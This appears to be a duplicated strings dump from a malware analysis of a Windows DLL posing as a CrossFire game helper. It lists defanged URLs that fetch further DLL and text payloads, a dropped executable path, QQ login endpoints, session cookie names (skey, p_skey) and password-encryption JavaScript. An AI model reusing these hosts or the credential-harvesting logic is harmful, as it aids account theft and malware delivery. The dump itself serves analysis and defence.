MA,FE9KR?WC ZI7WTqN?EJIKOPMUCMRRWHE[NSWWFWYXZ^aXcI]eU]bciJE`ORcOQjXEhYVrNIr\IyZTg^bfaIidXir_saJwgXyr^fhhkmrnqinrtyjerlszshvxyz|
MA,FE9KR?WC ZI7WTqN?EJIKOPMUCMRRWHE[NSWWFWYXZ^aXcI]eU]bciJE`ORcOQjXEhYVrNIr\IyZTg^bfaIidXir_saJwgXyr^fhhkmrnqinrtyjerlszshvxyz|
MA,FE9KR?WC ZI7WTqN?EJIKOPMUCMRRWHE[NSWWFWYXZ^aXcI]eU]bciJE`ORcOQjXEhZVrNIr\IyZTg^bfaIidXir_saJwgXyr^fhhkmrnqinrtyjerlszshvxyz|
MA,FE9KR?WC ZI7WTqN?EJIKOPMUCMRRWHE[NSWWFWYXZ^aXcI]eU]bciJE`ORcOQjXEhZVrNIr\IyZTg^bfaIidXir_saJwgXyr^fhhkmrnqinrtyjerlszshvxyz|
.pQ\ a
.pQ\ a
.NaH-*
.NaH-*
!)!!))!)-*1-(333:73_
!)!!))!)-*1-(333:73_
%XE%Z
%XE%Z
dj%d~
dj%d~
.PXF3
.PXF3
02/24/16
02/24/16
%UD-Od
%UD-Od
lI*wt.KK
lI*wt.KK
%4u3\2t
%4u3\2t
W.ctn
W.ctn
.yEXjmS
.yEXjmS
Yn7%X
Yn7%X
..RZd
..RZd
A$#%DR
A$#%DR
Wx.xlu
Wx.xlu
n.mJ~f#
n.mJ~f#
Il%UVl_
Il%UVl_
.mDB`
.mDB`
.ijWU5
.ijWU5
w%SY
w%SY
Wkbn%X
Wkbn%X
kEYH
kEYH
&.kPd
&.kPd
(s.PKL
(s.PKL
>%fZM
>%fZM
T2%xE
T2%xE
dQ]%U
dQ]%U
#.mkTSx
#.mkTSx
.Ag.~
.Ag.~
%f%%f
%f%%f
7".Fv
7".Fv
>.OsM
>.OsM
r.vDO
r.vDO
V2.6.0
V2.6.0
\CF_data.ini
\CF_data.ini
hXXp://q.qlogo.cn/headimg_dl?bs=qq&dst_uin=
hXXp://q.qlogo.cn/headimg_dl?bs=qq&dst_uin=
hXXp://blog.163.com/leesin_2017/blog/static/2672760322016102115848934/
hXXp://blog.163.com/leesin_2017/blog/static/2672760322016102115848934/
hXXp://note.youdao.com/yws/public/note/9eecf8d4c685cad98cef71bfc32bee84?keyfrom=public
hXXp://note.youdao.com/yws/public/note/9eecf8d4c685cad98cef71bfc32bee84?keyfrom=public
hXXp://xinzyw.com/cf.txt
hXXp://xinzyw.com/cf.txt
hXXp://cfzhushou.com/cf.txt
hXXp://cfzhushou.com/cf.txt
hXXp://VVV.cfzhushou.com
hXXp://VVV.cfzhushou.com
.text
.text
`.rdata
`.rdata
@.data
@.data
CF_Helper.dll
CF_Helper.dll
hXXp://baike2016.blog.163.com/blog/static/26993501420171281319931/
hXXp://baike2016.blog.163.com/blog/static/26993501420171281319931/
\CF_Helper.dll
\CF_Helper.dll
@.reloc
@.reloc
%Program Files%\sesvcs_%d_56089.exe
%Program Files%\sesvcs_%d_56089.exe
sesvcs_%d_56089.exe
sesvcs_%d_56089.exe
hXXp://down.9udn.com/aload/as/33.txt
hXXp://down.9udn.com/aload/as/33.txt
%Program Files%\23.txt
%Program Files%\23.txt
%Program Files%\NamuADLook.dll
%Program Files%\NamuADLook.dll
hXXp://xzdownad.zglhsw.com/aload/cp/NamuADLook.dll
hXXp://xzdownad.zglhsw.com/aload/cp/NamuADLook.dll
function not supported
function not supported
operation canceled
operation canceled
address_family_not_supported
address_family_not_supported
operation_in_progress
operation_in_progress
operation_not_supported
operation_not_supported
protocol_not_supported
protocol_not_supported
operation_would_block
operation_would_block
address family not supported
address family not supported
broken pipe
broken pipe
inappropriate io control operation
inappropriate io control operation
not supported
not supported
operation in progress
operation in progress
operation not permitted
operation not permitted
operation not supported
operation not supported
operation would block
operation would block
protocol not supported
protocol not supported
operator
operator
GetProcessWindowStation
GetProcessWindowStation
C:\Users\Administrator\Documents\Tencent Files\1148797355\FileRecv\DLL
C:\Users\Administrator\Documents\Tencent Files\1148797355\FileRecv\DLL
\xxx\Helper.pdb
\xxx\Helper.pdb
Helper.dll
Helper.dll
KERNEL32.dll
KERNEL32.dll
InternetCrackUrlA
InternetCrackUrlA
HttpQueryInfoW
HttpQueryInfoW
WININET.dll
WININET.dll
GetCPInfo
GetCPInfo
zcÃ
zcÃ
true
true
7.84888
7.84888
6 696?6{6
6 696?6{6
14686
14686
5 5(50585
5 5(50585
? ?$?,?@?`?
? ?$?,?@?`?
>$>0>4>8>
>$>0>4>8>
%d&&'
%d&&'
123456789
123456789
00003333
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
inflate 1.1.3 Copyright 1995-1998 Mark Adler
F%*.*f
F%*.*f
CNotSupportedException
CNotSupportedException
commctrl_DragListMsg
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
Afx:%x:%x
COMCTL32.DLL
COMCTL32.DLL
CCmdTarget
CCmdTarget
__MSVCRT_HEAP_SELECT
__MSVCRT_HEAP_SELECT
Broken pipe
Broken pipe
Inappropriate I/O control operation
Inappropriate I/O control operation
Operation not permitted
Operation not permitted
iphlpapi.dll
iphlpapi.dll
MPR.dll
MPR.dll
WINMM.dll
WINMM.dll
WS2_32.dll
WS2_32.dll
VERSION.dll
VERSION.dll
WinExec
WinExec
GetKeyState
GetKeyState
GetViewportOrgEx
GetViewportOrgEx
WINSPOOL.DRV
WINSPOOL.DRV
RegOpenKeyExA
RegOpenKeyExA
RegCreateKeyExA
RegCreateKeyExA
COMCTL32.dll
COMCTL32.dll
CreateDialogIndirectParamA
CreateDialogIndirectParamA
UnhookWindowsHookEx
UnhookWindowsHookEx
SetWindowsHookExA
SetWindowsHookExA
SetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
SetViewportExtEx
ScaleViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
GetViewportExtEx
comdlg32.dll
comdlg32.dll
.PAVCException@@
.PAVCException@@
Shell32.dll
Shell32.dll
Mpr.dll
Mpr.dll
Advapi32.dll
Advapi32.dll
(&07-034/)7 '
(&07-034/)7 '
?? / %d]
?? / %d]
%d / %d]
%d / %d]
.PAVCFileException@@
.PAVCFileException@@
: %d]
: %d]
(*.*)|*.*||
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
(*.CUR)|*.CUR|
%s:%d
%s:%d
windows
windows
.PAVCNotSupportedException@@
.PAVCNotSupportedException@@
out.prn
out.prn
(*.prn)|*.prn|
(*.prn)|*.prn|
%d.%d
%d.%d
%d/%d
%d/%d
1.6.9
1.6.9
unsupported zlib version
unsupported zlib version
png_read_image: unsupported transformation
png_read_image: unsupported transformation
%d / %d
%d / %d
Bogus message code %d
Bogus message code %d
libpng error: %s
libpng error: %s
libpng warning: %s
libpng warning: %s
1.1.3
1.1.3
bad keyword
bad keyword
libpng does not support gamma background rgb_to_gray
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
Palette is NULL in indexed image
(%d-%d):
(%d-%d):
%ld%c
%ld%c
.PAVCObject@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCResourceException@@
.PAVCUserException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
.PAVCArchiveException@@
#include "l.chs\afxres.rc" // Standard components
#include "l.chs\afxres.rc" // Standard components
cOXY/P.Z0.0.QR00/ZPP0000000/0PPZR.BI@/DE0,
cOXY/P.Z0.0.QR00/ZPP0000000/0PPZR.BI@/DE0,
PADPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDD:\
PADPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDD:\
01/04/17
01/04/17
&s_url=http://cf.qq.com/comm-htdocs/login/logincallback.htm&f_url=&ptlang=2052&ptredirect=100&aid=21000124&daid=8&j_later=0&low_login_hour=0®master=0&pt_login_type=1&pt_aid=0&pt_aaid=0&pt_light=0&pt_3rd_aid=0
&s_url=http://cf.qq.com/comm-htdocs/login/logincallback.htm&f_url=&ptlang=2052&ptredirect=100&aid=21000124&daid=8&j_later=0&low_login_hour=0®master=0&pt_login_type=1&pt_aid=0&pt_aaid=0&pt_light=0&pt_3rd_aid=0
&service=login&nodirect=0&ptsigx=
&service=login&nodirect=0&ptsigx=
hXXp://ptlogin4.game.qq.com/check_sig?pttype=1&uin=
hXXp://ptlogin4.game.qq.com/check_sig?pttype=1&uin=
p_skey=
p_skey=
skey=
skey=
szNick_name=
szNick_name=
hXXp://cdn.tgp.qq.com/cf/v3/images/level/BigClass_
hXXp://cdn.tgp.qq.com/cf/v3/images/level/BigClass_
hXXp://VVV.51.la/report/1_main.asp?id=18855916
hXXp://VVV.51.la/report/1_main.asp?id=18855916
hXXp://VVV.51.la/report/1_main_online.asp?id=18855916
hXXp://VVV.51.la/report/1_main_online.asp?id=18855916
hXXp://count.knowsky.com/count2/count.asp?id=85436&sx=1&ys=43
hXXp://count.knowsky.com/count2/count.asp?id=85436&sx=1&ys=43
hXXp://count.knowsky.com/img/(.*?)/(.*?).gif
hXXp://count.knowsky.com/img/(.*?)/(.*?).gif
hXXp://apps.game.qq.com/comm-cgi-bin/content_admin/activity_center/query_role.cgi?game=cf&area=
hXXp://apps.game.qq.com/comm-cgi-bin/content_admin/activity_center/query_role.cgi?game=cf&area=
hXXp://apps.game.qq.com/cf/a20141126main/getUserInfo.php?action=initQuery&sArea=
hXXp://apps.game.qq.com/cf/a20141126main/getUserInfo.php?action=initQuery&sArea=
tEXtXML:com.adobe.xmp
tEXtXML:com.adobe.xmp
xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/"
xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/"
xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/"
xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/"
xmlns:dc="hXXp://purl.org/dc/elements/1.1/"
xmlns:dc="hXXp://purl.org/dc/elements/1.1/"
xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/"
xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/"
xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#"
xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#"
xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#"
xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#"
xmlns:tiff="hXXp://ns.adobe.com/tiff/1.0/"
xmlns:tiff="hXXp://ns.adobe.com/tiff/1.0/"
xmlns:exif="hXXp://ns.adobe.com/exif/1.0/">
xmlns:exif="hXXp://ns.adobe.com/exif/1.0/">
Adobe Photoshop CC (Windows)
Adobe Photoshop CC (Windows)
/* |xGv00|13a28bd5e87728de7241d2f04c3c02f5 */hXXp://apps.game.qq.com/cgi-bin/cf/cfvip/checkCFvipStatue.cgi?rd=0.3552593735512346&_=1459778886737
/* |xGv00|13a28bd5e87728de7241d2f04c3c02f5 */hXXp://apps.game.qq.com/cgi-bin/cf/cfvip/checkCFvipStatue.cgi?rd=0.3552593735512346&_=1459778886737
msg":"
msg":"
hXXp://apps.game.qq.com/cf/cfvip/doCfVip.php?action=getCfVipInfo&rd=0.16843547895445687&_=1459479795992
hXXp://apps.game.qq.com/cf/cfvip/doCfVip.php?action=getCfVipInfo&rd=0.16843547895445687&_=1459479795992
hXXp://apps.game.qq.com/php/tgclub/v2/user/logininfo?callback=jQuery17209628733010031283_1459773913284&_=1459773913464
hXXp://apps.game.qq.com/php/tgclub/v2/user/logininfo?callback=jQuery17209628733010031283_1459773913284&_=1459773913464
ÿF8>NFFFh
ÿF8>NFFFh
ÿFV
ÿFV
,.Ey)
,.Ey)
qTcp,
qTcp,
hXXp://wpa.qq.com/msgrd?v=3&uin=138417120&site=qq&menu=yes
hXXp://wpa.qq.com/msgrd?v=3&uin=138417120&site=qq&menu=yes
&appid=15000103&js_ver=10153&js_type=1&login_sig=0nLadn6F*IOLoKBk7n-g3iCxqdCGPSIeyZhV-iaDTmCcf6BeP3DeVa3TGrAvmDod&u1=http://act.qzone.qq.com/meteor/pc/index.html?rid=998=1000&e_code=224288?ADTAG=bangbang.hdsq&r=0.15214470936916769
&appid=15000103&js_ver=10153&js_type=1&login_sig=0nLadn6F*IOLoKBk7n-g3iCxqdCGPSIeyZhV-iaDTmCcf6BeP3DeVa3TGrAvmDod&u1=http://act.qzone.qq.com/meteor/pc/index.html?rid=998=1000&e_code=224288?ADTAG=bangbang.hdsq&r=0.15214470936916769
hXXp://check.ptlogin2.qq.com/check?regmaster=&pt_tea=1&pt_vcode=1&uin=
hXXp://check.ptlogin2.qq.com/check?regmaster=&pt_tea=1&pt_vcode=1&uin=
&pt_randsalt=0&ptredirect=1&u1=http://act.qzone.qq.com/meteor/pc/index.html?rid=998=1000&e_code=224288?ADTAG=bangbang.hdsq&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=2-6-1461659794871&js_ver=10153&js_type=1&login_sig=0nLadn6F*IOLoKBk7n-g3iCxqdCGPSIeyZhV-iaDTmCcf6BeP3DeVa3TGrAvmDod&pt_uistyle=20&aid=15000103&daid=5&
&pt_randsalt=0&ptredirect=1&u1=http://act.qzone.qq.com/meteor/pc/index.html?rid=998=1000&e_code=224288?ADTAG=bangbang.hdsq&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=2-6-1461659794871&js_ver=10153&js_type=1&login_sig=0nLadn6F*IOLoKBk7n-g3iCxqdCGPSIeyZhV-iaDTmCcf6BeP3DeVa3TGrAvmDod&pt_uistyle=20&aid=15000103&daid=5&
hXXp://ptlogin2.qq.com/login?u=
hXXp://ptlogin2.qq.com/login?u=
&s_url=http://act.qzone.qq.com/meteor/pc/index.html?rid=998=1000&e_code=224288?ADTAG=bangbang.hdsq&f_url=&ptlang=2052&ptredirect=100&aid=1000101&daid=5&j_later=0&low_login_hour=0®master=0&pt_login_type=2&pt_aid=15000103&pt_aaid=0&pt_light=0&pt_3rd_aid=0
&s_url=http://act.qzone.qq.com/meteor/pc/index.html?rid=998=1000&e_code=224288?ADTAG=bangbang.hdsq&f_url=&ptlang=2052&ptredirect=100&aid=1000101&daid=5&j_later=0&low_login_hour=0®master=0&pt_login_type=2&pt_aid=15000103&pt_aaid=0&pt_light=0&pt_3rd_aid=0
hXXp://ptlogin4.qzone.qq.com/check_sig?pttype=2&uin=
hXXp://ptlogin4.qzone.qq.com/check_sig?pttype=2&uin=
return binl2hex(core_md5(str2binl(s), s.length * chrsz))
return binl2hex(core_md5(str2binl(s), s.length * chrsz))
return binl2str(core_md5(str2binl(s), s.length * chrsz))
return binl2str(core_md5(str2binl(s), s.length * chrsz))
function hex_hmac_md5(key, data) {
function hex_hmac_md5(key, data) {
return binl2hex(core_hmac_md5(key, data))
return binl2hex(core_hmac_md5(key, data))
function b64_hmac_md5(key, data) {
function b64_hmac_md5(key, data) {
return binl2b64(core_hmac_md5(key, data))
return binl2b64(core_hmac_md5(key, data))
function str_hmac_md5(key, data) {
function str_hmac_md5(key, data) {
return binl2str(core_hmac_md5(key, data))
return binl2str(core_hmac_md5(key, data))
for (var i = 0; i
for (var i = 0; i
function core_hmac_md5(key, data) {
function core_hmac_md5(key, data) {
var bkey = str2binl(key);
var bkey = str2binl(key);
if (bkey.length > 16) {
if (bkey.length > 16) {
bkey = core_md5(bkey, key.length * chrsz)
bkey = core_md5(bkey, key.length * chrsz)
ipad[i] = bkey[i] ^ 909522486;
ipad[i] = bkey[i] ^ 909522486;
opad[i] = bkey[i] ^ 1549556828
opad[i] = bkey[i] ^ 1549556828
var hash = core_md5(ipad.concat(str2binl(data)), 512 data.length * chrsz);
var hash = core_md5(ipad.concat(str2binl(data)), 512 data.length * chrsz);
return core_md5(opad.concat(hash), 512 128)
return core_md5(opad.concat(hash), 512 128)
for (var i = 0; i
for (var i = 0; i
bin[i >> 5] |= (str.charCodeAt(i / chrsz) & mask)
bin[i >> 5] |= (str.charCodeAt(i / chrsz) & mask)
for (var i = 0; i
for (var i = 0; i
str = String.fromCharCode((bin[i >> 5] >>> (i % 32)) & mask)
str = String.fromCharCode((bin[i >> 5] >>> (i % 32)) & mask)
for (var i = 0; i
for (var i = 0; i
str = hex_tab.charAt((binarray[i >> 2] >> ((i % 4) * 8 4)) & 15) hex_tab.charAt((binarray[i >> 2] >> ((i % 4) * 8)) & 15)
str = hex_tab.charAt((binarray[i >> 2] >> ((i % 4) * 8 4)) & 15) hex_tab.charAt((binarray[i >> 2] >> ((i % 4) * 8)) & 15)
for (var i = 0; i
for (var i = 0; i
if (i * 8 j * 6 > binarray.length * 32) {
if (i * 8 j * 6 > binarray.length * 32) {
str = tab.charAt((triplet >> 6 * (3 - j)) & 63)
str = tab.charAt((triplet >> 6 * (3 - j)) & 63)
for (var i = 0; i
for (var i = 0; i
arr.push('\\x' str.substr(i, 2))
arr.push('\\x' str.substr(i, 2))
arr = arr.join('');
arr = arr.join('');
function getEncryption(password, salt, vcode, isMd5) {
function getEncryption(password, salt, vcode, isMd5) {
password = password || '';
password = password || '';
var md5Pwd = isMd5 ? password: md5(password),
var md5Pwd = isMd5 ? password: md5(password),
rsaH1 = $.RSA.rsa_encrypt(h1),
rsaH1 = $.RSA.rsa_encrypt(h1),
rsaH1Len = (rsaH1.length / 2).toString(16),
rsaH1Len = (rsaH1.length / 2).toString(16),
hexVcode = TEA.strToBytes(vcode.toUpperCase()),
hexVcode = TEA.strToBytes(vcode.toUpperCase()),
vcodeLen = '000' vcode.length.toString(16);
vcodeLen = '000' vcode.length.toString(16);
while (rsaH1Len.length
while (rsaH1Len.length
TEA.initkey(s2);
TEA.initkey(s2);
var saltPwd = TEA.enAsBase64(rsaH1Len rsaH1 TEA.strToBytes(salt) vcodeLen hexVcode);
var saltPwd = TEA.enAsBase64(rsaH1Len rsaH1 TEA.strToBytes(salt) vcodeLen hexVcode);
TEA.initkey('');
TEA.initkey('');
return saltPwd.replace(/[\/\ =]/g,
return saltPwd.replace(/[\/\ =]/g,
'/': '-',
'/': '-',
' ': '*',
' ': '*',
'=': '_'
'=': '_'
function getRSAEncryption(password, vcode, isMd5) {
function getRSAEncryption(password, vcode, isMd5) {
var str1 = isMd5 ? password: md5(password);
var str1 = isMd5 ? password: md5(password);
var str2 = str1 vcode.toUpperCase();
var str2 = str1 vcode.toUpperCase();
var str3 = $.RSA.rsa_encrypt(str2);
var str3 = $.RSA.rsa_encrypt(str2);
$.RSA = function() {
$.RSA = function() {
while (z aD
while (z aD
t = aC.substring(z, z aD) '\n';
t = aC.substring(z, z aD) '\n';
return t aC.substring(z, aC.length)
return t aC.substring(z, aC.length)
return '0' t.toString(16)
return '0' t.toString(16)
return t.toString(16)
return t.toString(16)
if (aG
if (aG
var aC = aD.length - 1;
var aC = aD.length - 1;
var aE = aD.charCodeAt(aC--);
var aE = aD.charCodeAt(aC--);
z.nextBytes(t)
z.nextBytes(t)
this.dmp1 = null;
this.dmp1 = null;
this.dmq1 = null;
this.dmq1 = null;
this.coeff = null
this.coeff = null
if (z != null && t != null && z.length > 0 && t.length > 0) {
if (z != null && t != null && z.length > 0 && t.length > 0) {
uv_alert('Invalid RSA public key')
uv_alert('Invalid RSA public key')
return t.modPowInt(this.e, this.n)
return t.modPowInt(this.e, this.n)
var t = ah(aC, (this.n.bitLength() 7) >> 3);
var t = ah(aC, (this.n.bitLength() 7) >> 3);
var aD = this.doPublic(t);
var aD = this.doPublic(t);
var z = aD.toString(16);
var z = aD.toString(16);
if ((z.length & 1) == 0) {
if ((z.length & 1) == 0) {
N.prototype.doPublic = Y;
N.prototype.doPublic = Y;
N.prototype.setPublic = q;
N.prototype.setPublic = q;
N.prototype.encrypt = r;
N.prototype.encrypt = r;
this.fromNumber(z, t, aC)
this.fromNumber(z, t, aC)
this.fromString(z, 256)
this.fromString(z, 256)
this.fromString(z, t)
this.fromString(z, t)
aG = Math.floor(aC / 67108864);
aG = Math.floor(aC / 67108864);
if (ab && (navigator.appName == 'Microsoft Internet Explorer')) {
if (ab && (navigator.appName == 'Microsoft Internet Explorer')) {
au.prototype.am = aA;
au.prototype.am = aA;
if (ab && (navigator.appName != 'Netscape')) {
if (ab && (navigator.appName != 'Netscape')) {
au.prototype.am = b;
au.prototype.am = b;
au.prototype.am = az;
au.prototype.am = az;
au.prototype.DB = ay;
au.prototype.DB = ay;
au.prototype.DM = ((1
au.prototype.DM = ((1
au.prototype.DV = (1
au.prototype.DV = (1
au.prototype.FV = Math.pow(2, ac);
au.prototype.FV = Math.pow(2, ac);
au.prototype.F1 = ac - ay;
au.prototype.F1 = ac - ay;
au.prototype.F2 = 2 * ay - ac;
au.prototype.F2 = 2 * ay - ac;
ar = '0'.charCodeAt(0);
ar = '0'.charCodeAt(0);
ar = 'a'.charCodeAt(0);
ar = 'a'.charCodeAt(0);
ar = 'A'.charCodeAt(0);
ar = 'A'.charCodeAt(0);
return ag.charAt(t)
return ag.charAt(t)
var aC = ai[z.charCodeAt(t)];
var aC = ai[z.charCodeAt(t)];
z.fromInt(t);
z.fromInt(t);
this.fromRadix(aG, z);
this.fromRadix(aG, z);
var aF = aG.length,
var aF = aG.length,
if (aG.charAt(aF) == '-') {
if (aG.charAt(aF) == '-') {
if (aE aD > this.DB) {
if (aE aD > this.DB) {
this[this.t - 1] |= (t & ((1
this[this.t - 1] |= (t & ((1
this[this.t ] = (t >> (this.DB - aE))
this[this.t ] = (t >> (this.DB - aE))
if (aE >= this.DB) {
if (aE >= this.DB) {
aE -= this.DB
aE -= this.DB
this[this.t - 1] |= ((1
this[this.t - 1] |= ((1
this.clamp();
this.clamp();
au.ZERO.subTo(this, this)
au.ZERO.subTo(this, this)
var t = this.s & this.DM;
var t = this.s & this.DM;
return '-' this.negate().toString(z)
return '-' this.negate().toString(z)
return this.toRadix(z)
return this.toRadix(z)
var aG = this.DB - (aD * this.DB) % aC;
var aG = this.DB - (aD * this.DB) % aC;
if (aG > aG) > 0) {
if (aG > aG) > 0) {
aH |= this[--aD] >> (aG = this.DB - aC)
aH |= this[--aD] >> (aG = this.DB - aC)
aG = this.DB; --aD
aG = this.DB; --aD
au.ZERO.subTo(this, t);
au.ZERO.subTo(this, t);
return (this.s
return (this.s
return this.DB * (this.t - 1) l(this[this.t - 1] ^ (this.s & this.DM))
return this.DB * (this.t - 1) l(this[this.t - 1] ^ (this.s & this.DM))
z.t = Math.max(this.t - aC, 0);
z.t = Math.max(this.t - aC, 0);
var z = aH % this.DB;
var z = aH % this.DB;
var t = this.DB - z;
var t = this.DB - z;
var aE = Math.floor(aH / this.DB),
var aE = Math.floor(aH / this.DB),
aG = (this.s
aG = (this.s
aD.clamp()
aD.clamp()
var aE = Math.floor(aG / this.DB);
var aE = Math.floor(aG / this.DB);
var z = aG % this.DB;
var z = aG % this.DB;
t = Math.min(z.t, this.t);
t = Math.min(z.t, this.t);
aD[aC ] = aE & this.DM;
aD[aC ] = aE & this.DM;
aE >>= this.DB
aE >>= this.DB
aD[aC ] = aE & this.DM;
aD[aC ] = aE & this.DM;
aE >>= this.DB
aE >>= this.DB
aD[aC ] = this.DV aE
aD[aC ] = this.DV aE
var t = this.abs(),
var t = this.abs(),
aE = z.abs();
aE = z.abs();
aD[aC t.t] = t.am(0, aE[aC], aD, aC, 0, t.t)
aD[aC t.t] = t.am(0, aE[aC], aD, aC, 0, t.t)
aD.clamp();
aD.clamp();
au.ZERO.subTo(aD, aD)
au.ZERO.subTo(aD, aD)
var t = this.abs();
var t = this.abs();
var aD = t.am(z, t[z], aC, 2 * z, 0, 1);
var aD = t.am(z, t[z], aC, 2 * z, 0, 1);
if ((aC[z t.t] = t.am(z 1, 2 * t[z], aC, 2 * z 1, aD, t.t - z - 1)) >= t.DV) {
if ((aC[z t.t] = t.am(z 1, 2 * t[z], aC, 2 * z 1, aD, t.t - z - 1)) >= t.DV) {
aC[z t.t] -= t.DV;
aC[z t.t] -= t.DV;
aC[aC.t - 1] = t.am(z, t[z], aC, 2 * z, 0, 1)
aC[aC.t - 1] = t.am(z, t[z], aC, 2 * z, 0, 1)
aC.clamp()
aC.clamp()
var aQ = aK.abs();
var aQ = aK.abs();
var aI = this.abs();
var aI = this.abs();
aH.fromInt(0)
aH.fromInt(0)
this.copyTo(aG)
this.copyTo(aG)
var aP = this.DB - l(aQ[aQ.t - 1]);
var aP = this.DB - l(aQ[aQ.t - 1]);
aQ.lShiftTo(aP, aE);
aQ.lShiftTo(aP, aE);
aI.lShiftTo(aP, aG)
aI.lShiftTo(aP, aG)
aQ.copyTo(aE);
aQ.copyTo(aE);
aI.copyTo(aG)
aI.copyTo(aG)
var aT = this.FV / aL,
var aT = this.FV / aL,
aE.dlShiftTo(aN, aF);
aE.dlShiftTo(aN, aF);
if (aG.compareTo(aF) >= 0) {
if (aG.compareTo(aF) >= 0) {
aG.subTo(aF, aG)
aG.subTo(aF, aG)
au.ONE.dlShiftTo(aM, aF);
au.ONE.dlShiftTo(aM, aF);
aF.subTo(aE, aE);
aF.subTo(aE, aE);
var aD = (aG[--aO] == aC) ? this.DM: Math.floor(aG[aO] * aT (aG[aO - 1] aR) * aS);
var aD = (aG[--aO] == aC) ? this.DM: Math.floor(aG[aO] * aT (aG[aO - 1] aR) * aS);
if ((aG[aO] = aE.am(0, aD, aG, aN, 0, aM))
if ((aG[aO] = aE.am(0, aD, aG, aN, 0, aM))
aE.dlShiftTo(aN, aF);
aE.dlShiftTo(aN, aF);
aG.subTo(aF, aG);
aG.subTo(aF, aG);
aG.subTo(aF, aG)
